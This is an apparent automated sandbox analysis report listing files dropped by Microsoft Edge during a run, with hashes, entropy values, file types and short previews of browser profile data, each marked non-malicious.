                                                                                                                                                                                                                                                        SHA-512:F91F5BFBD1797691858A915A0ED025587B1E2A1C17BB3030F9BA29086FB7E461C1924C7ED83102F52437B9E90C267ED94CD2A3B98299564C07EA2A43E0C0AEAD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............M...b................next-map-id.1.Cnamespace-98d95b0e_44e0_4770_b806_de730d1a8eb8-https://ntp.msn.com/.0.....................map-0-shd_sweeper.%{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.e.t.q.o.h.p.a.d.,.p.r.g.-.d.l.t.q.,.p.r.g.-.e.h.p.s.b.t.q.s.t.,.x.a.d.s.-.a.d.q.i.s.c.b.m.m.-.c.,.p.r.g.-.1.s.w.-.m.i.t.o.t.d.u.s.-.c.,.i.c.r.s.c.a.l.l.-.s.p.o.r.t.s.,.p.r.g.-.1.s.w.-.s.a.g.e.i.m.a.n.n.t.2.,.p.r.g.-.1.s.w.-.s.a.g.e.e.x.2.e.,.p.r.g.-.1.s.w.-.s.a.-.m.a.i.p.r.o.f.i.l.e._.c.,.p.r.g.-.1.s.w.-.s.a.d.c.f.r.t.,.p.r.g.-.1.s.w.-.s.a.e.r.e.v.a.b.1.c.c.,.p.r.g.-.1.s.w.-.t.m.u.i.d.s.y.n.c.r.f.w.o.e.r.r.,.p.r.g.-.1.s.w.-.r.e.f.r.e.s.h.p.,.p.r.g.-.1.s.w.-.t.m.u.i.d.1.s.s.y.n.c.,.1.s.w.-.t.p.s.n.-.d.s.t.p.r.g.1.d.c.y.-.c.,.p.r.g.-.1.s.w.-.m.e.b.c.8.2.,.p.r.g.-.1.s.w.-.m.o.n.e.x.p.b.,.2.4.0.9.-.n.e.w.-.b.i.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):324
                                                                                                                                                                                                                                                        Entropy (8bit):5.129820137422235
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHcAMTq2P923oH+TcwtrQMxIFUt8YHcAuGZmw+YHcEkwO923oH+TcwtrQMFLJ:npMTv4YebCFUt8kpn/+k75LYebtJ
                                                                                                                                                                                                                                                        MD5:6B6E361DE355BB75AA1706F54111098C
                                                                                                                                                                                                                                                        SHA1:36125B119BDA0338D7790D69CE661803E8B601A0
                                                                                                                                                                                                                                                        SHA-256:386ADFDBBA94482929E8CB25E28D6AE7F34595DF9AD80CC177342A95315FE36A
                                                                                                                                                                                                                                                        SHA-512:DB2D6AB8FA23275A890D642AB4C7D925B932CE4F94DEFB13F20BCD2398266E1425909E1AECA5225B3F6664424F8B638CA6129727AF477D8E781CCDDC1496CFCC
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:28.033 1970 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/20-18:49:28.039 1970 Recovering log #3.2024/11/20-18:49:28.048 1970 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):324
                                                                                                                                                                                                                                                        Entropy (8bit):5.129820137422235
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHcAMTq2P923oH+TcwtrQMxIFUt8YHcAuGZmw+YHcEkwO923oH+TcwtrQMFLJ:npMTv4YebCFUt8kpn/+k75LYebtJ
                                                                                                                                                                                                                                                        MD5:6B6E361DE355BB75AA1706F54111098C
                                                                                                                                                                                                                                                        SHA1:36125B119BDA0338D7790D69CE661803E8B601A0
                                                                                                                                                                                                                                                        SHA-256:386ADFDBBA94482929E8CB25E28D6AE7F34595DF9AD80CC177342A95315FE36A
                                                                                                                                                                                                                                                        SHA-512:DB2D6AB8FA23275A890D642AB4C7D925B932CE4F94DEFB13F20BCD2398266E1425909E1AECA5225B3F6664424F8B638CA6129727AF477D8E781CCDDC1496CFCC
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:28.033 1970 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/20-18:49:28.039 1970 Recovering log #3.2024/11/20-18:49:28.048 1970 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1443
                                                                                                                                                                                                                                                        Entropy (8bit):3.8018003474539386
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:3DqrZX83OyeDStpsAF4unxNotLp3X2amEtG1ChquHKA2lcTQKkOAM43:3DEiOkzFYLp2FEkCh9HiqcHOp
                                                                                                                                                                                                                                                        MD5:76CD8EC5FA43BB418385BB02D035549C
                                                                                                                                                                                                                                                        SHA1:32CDF270A7FA940AF2E354CF2616E4B83F499F8C
                                                                                                                                                                                                                                                        SHA-256:DCFB6FC5F90CA1AEEBB3DCD1E2B8AA4D811C4C5577836123BC1FDA90826AB09F
                                                                                                                                                                                                                                                        SHA-512:D7DC65D606EA91BD2C659221865D097BF6ED8FED873B9D6892BA3FB4D56009A78C2F8201CDAF851D45DFF72D2CD2F32FA956DA3013FE535B05037AAF8528FC42
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:SNSS.......T.57...........T.57......"T.57...........T.57.......T.57.......U.57.......U.57....!..U.57...............................T.57U.571..,...U.57$...98d95b0e_44e0_4770_b806_de730d1a8eb8...T.57.......U.57....CU.........T.57...T.57.......................T.57....................5..0...T.57&...{98952893-68FF-4A5D-A164-705C709ED3DB}.....T.57.......T.57..........................U.57...........U.57........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x........"..`'..."..`'.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                        Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                        MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                        SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                        SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                        SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):352
                                                                                                                                                                                                                                                        Entropy (8bit):5.145200521416917
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHQ9+q2P923oH+Tcwt7Uh2ghZIFUt8YHx8JZmw+YHx89VkwO923oH+Tcwt7Uh2gd:nQ4v4YebIhHh2FUt8kx8J/+kx8D5LYeQ
                                                                                                                                                                                                                                                        MD5:3645749DBEE2B19DD692E2689F348D18
                                                                                                                                                                                                                                                        SHA1:A2781D849ACD5CFD64D2EED9CC71160055ACAFF3
                                                                                                                                                                                                                                                        SHA-256:35C1CD86F516237BF05C0E636C4A0F7E48F34FF54EDC7E110109CBC0BFC54B16
                                                                                                                                                                                                                                                        SHA-512:439957F20856798AA18F84DEAD31FB894D6DBDCC21EE2769FA2A74A41FFAC90294A7F42D6DED2B818054D41A48A6CDFFEB39972A8E5F1F582E7819C64D84D29B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:27.329 1428 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/20-18:49:27.330 1428 Recovering log #3.2024/11/20-18:49:27.330 1428 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):352
                                                                                                                                                                                                                                                        Entropy (8bit):5.145200521416917
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHQ9+q2P923oH+Tcwt7Uh2ghZIFUt8YHx8JZmw+YHx89VkwO923oH+Tcwt7Uh2gd:nQ4v4YebIhHh2FUt8kx8J/+kx8D5LYeQ
                                                                                                                                                                                                                                                        MD5:3645749DBEE2B19DD692E2689F348D18
                                                                                                                                                                                                                                                        SHA1:A2781D849ACD5CFD64D2EED9CC71160055ACAFF3
                                                                                                                                                                                                                                                        SHA-256:35C1CD86F516237BF05C0E636C4A0F7E48F34FF54EDC7E110109CBC0BFC54B16
                                                                                                                                                                                                                                                        SHA-512:439957F20856798AA18F84DEAD31FB894D6DBDCC21EE2769FA2A74A41FFAC90294A7F42D6DED2B818054D41A48A6CDFFEB39972A8E5F1F582E7819C64D84D29B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:27.329 1428 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/20-18:49:27.330 1428 Recovering log #3.2024/11/20-18:49:27.330 1428 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):434
                                                                                                                                                                                                                                                        Entropy (8bit):5.214158269261143
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:nSFIv4YebvqBQFUt8kpy1/+kpT5LYebvqBvJ:nn4YebvZg8kp+pFLYebvk
                                                                                                                                                                                                                                                        MD5:C250B45E139987BF882A013494D3061B
                                                                                                                                                                                                                                                        SHA1:6AA7A405506234926503FA7FC03B0BC00899F810
                                                                                                                                                                                                                                                        SHA-256:5114B75B2993DF17CA7CA4B841784C6AC2C9495B67DCF5A75B29354668F9DE1B
                                                                                                                                                                                                                                                        SHA-512:6DAACEA10FF7AD2E29186E0D0E41445EA02EB30C155E59D0D94C2E5D2423890ADBB039E857A6B72386DB7B7B81C2C90A4322A4AEE8FB68CA0217FF437FBDD877
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:28.027 1c14 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/20-18:49:28.030 1c14 Recovering log #3.2024/11/20-18:49:28.033 1c14 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):434
                                                                                                                                                                                                                                                        Entropy (8bit):5.214158269261143
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:nSFIv4YebvqBQFUt8kpy1/+kpT5LYebvqBvJ:nn4YebvZg8kp+pFLYebvk
                                                                                                                                                                                                                                                        MD5:C250B45E139987BF882A013494D3061B
                                                                                                                                                                                                                                                        SHA1:6AA7A405506234926503FA7FC03B0BC00899F810
                                                                                                                                                                                                                                                        SHA-256:5114B75B2993DF17CA7CA4B841784C6AC2C9495B67DCF5A75B29354668F9DE1B
                                                                                                                                                                                                                                                        SHA-512:6DAACEA10FF7AD2E29186E0D0E41445EA02EB30C155E59D0D94C2E5D2423890ADBB039E857A6B72386DB7B7B81C2C90A4322A4AEE8FB68CA0217FF437FBDD877
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:28.027 1c14 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/20-18:49:28.030 1c14 Recovering log #3.2024/11/20-18:49:28.033 1c14 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):144
                                                                                                                                                                                                                                                        Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
                                                                                                                                                                                                                                                        MD5:ABE81C38891A875B52127ACE9C314105
                                                                                                                                                                                                                                                        SHA1:8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
                                                                                                                                                                                                                                                        SHA-256:6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
                                                                                                                                                                                                                                                        SHA-512:B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):144
                                                                                                                                                                                                                                                        Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
                                                                                                                                                                                                                                                        MD5:ABE81C38891A875B52127ACE9C314105
                                                                                                                                                                                                                                                        SHA1:8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
                                                                                                                                                                                                                                                        SHA-256:6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
                                                                                                                                                                                                                                                        SHA-512:B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:[]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                                                                                        Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                        MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                        SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                        SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                        SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):80
                                                                                                                                                                                                                                                        Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                        MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                        SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                        SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                        SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):422
                                                                                                                                                                                                                                                        Entropy (8bit):5.281277031552386
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:n/vTv4YebvqBZFUt8k/JZ/+k/F5LYebvqBaJ:n/vz4Yebvyg8k/Jt/XLYebvL
                                                                                                                                                                                                                                                        MD5:C39041EE731E23986DDF6C9A9236E767
